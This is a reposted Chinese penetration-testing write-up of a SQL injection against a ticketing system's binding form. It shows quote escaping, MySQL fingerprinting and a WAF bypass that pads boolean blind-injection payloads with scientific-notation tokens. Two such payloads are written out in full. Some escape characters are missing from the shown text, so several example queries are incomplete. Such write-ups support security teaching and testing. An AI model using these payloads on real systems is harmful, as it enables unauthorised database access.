引号的突围!SQL注入的秘密探索

admin 2024年5月17日19:13:53评论9 views字数 1468阅读4分53秒阅读模式

0x1 前言

好久没有遇到那么符合预设环境的漏洞情况了,标题跟部分内容的文笔由ai美化了,看起来诗情画意的?(可能

0x02 过程

是一个需要统一认证的工单系统,首页是展示最近的工单

引号的突围!SQL注入的秘密探索

右上角有个我的工单,点击后会要求绑定工号

引号的突围!SQL注入的秘密探索

需要两个参数,一个是工号一个绑定码

引号的突围!SQL注入的秘密探索

先随意输入一些内容然后抓包,可以看到有两个参数workNum bindCode

引号的突围!SQL注入的秘密探索

接下来通过对后端语句的推测和巧妙的输入操纵,利用符号犹如钥匙般打开了逃逸单引号限制的大门,逐步探入SQL注入的世界,首先当然是对两个参数进行常规的单双引号测试'",当然是没有效果的没有任何变化

引号的突围!SQL注入的秘密探索

workNum尝试输入 发现提示sql语句报错

引号的突围!SQL注入的秘密探索

bindCode也测试一下,发现也报错,猜测后端没有进行预处理也没有用类似于addslashes函数进行处理而是自己进行的单双引号的处理但是没有处理符号转义了原有的引号导致了我们输入的参数逃逸出了引号的限制

引号的突围!SQL注入的秘密探索

首先猜测后端语句大概如下

select xxx from where workNum='可控' and bindCode='可控'

那么我在workNum传入时语句如下,他后面那个单引号被反引号注释掉了逃出了单引号的限制

select xxx from where workNum='可控' and bindCode='可控'

此时workNum的值为红色部分,可以发现第二个可控的部分并不在引号内可以进行sql注入

  • select xxx from where workNum='可控' and bindCode='可控'

那么在workNum传入,bindCode传--+语句如下可以发现有了一个可以操作的可控点

  • select xxx from where workNum='' and bindCode=' 可控点 --+'

因为系统带有waf这里先轻微的使用不那么容易触发waf的语句来测一下是什么数据库,传入内容如下

workNum=&bindCode=%2BCURRENT_USER--+

后端语句大概如下,也就是+上CURRENT_USER Mysql的用户名函数

select xxx from where workNum='' and bindCode='+ CURRENT_USER--+'

发现并没有报错

引号的突围!SQL注入的秘密探索

改掉一位试试看发现提示sql语句错误,那么这里就判断为mysql数据库

引号的突围!SQL注入的秘密探索

旅程并非一帆风顺,WAF如同一道屏障挡在面前。接下来我将运用科学计数法如同舞者般优雅地绕过了WAF的限制,编织出if语句的旋律进行真相的探寻。

这里用科学计数法绕过waf构造if,构造出true/false来注入,这里判断用户名长度是否等于1显然错误返回错误,使用<>大/小于号都会报错,猜测是后端对<>进行了处理用来防止xss导致没办法用大于小于来快速判断范围我这里就用=号一位一位判断了

workNum=&bindCode=%2bif+520.e(length+520.e(CURRENT_USER+520.e)=1,1,exp+520.e(999+520.e)+520.e)%23

引号的突围!SQL注入的秘密探索

等于11位的时候页面返回正常,这里就得到了用户名部分为11位

引号的突围!SQL注入的秘密探索

在来判断个数据库名,得到长度为5,点到为止,下班

workNum=&bindCode=%2bif+520.e(length+520.e(schema+520.e(+520.e)+520.e)=5,1,exp+520.e(999+520.e)+520.e)%23

引号的突围!SQL注入的秘密探索

来源:https://blog.mo60.cn/index.php/archives/1420.html

引号的突围!SQL注入的秘密探索

原文始发于微信公众号(船山信安):引号的突围!SQL注入的秘密探索

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月17日19:13:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   引号的突围!SQL注入的秘密探索http://cn-sec.com/archives/2745244.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息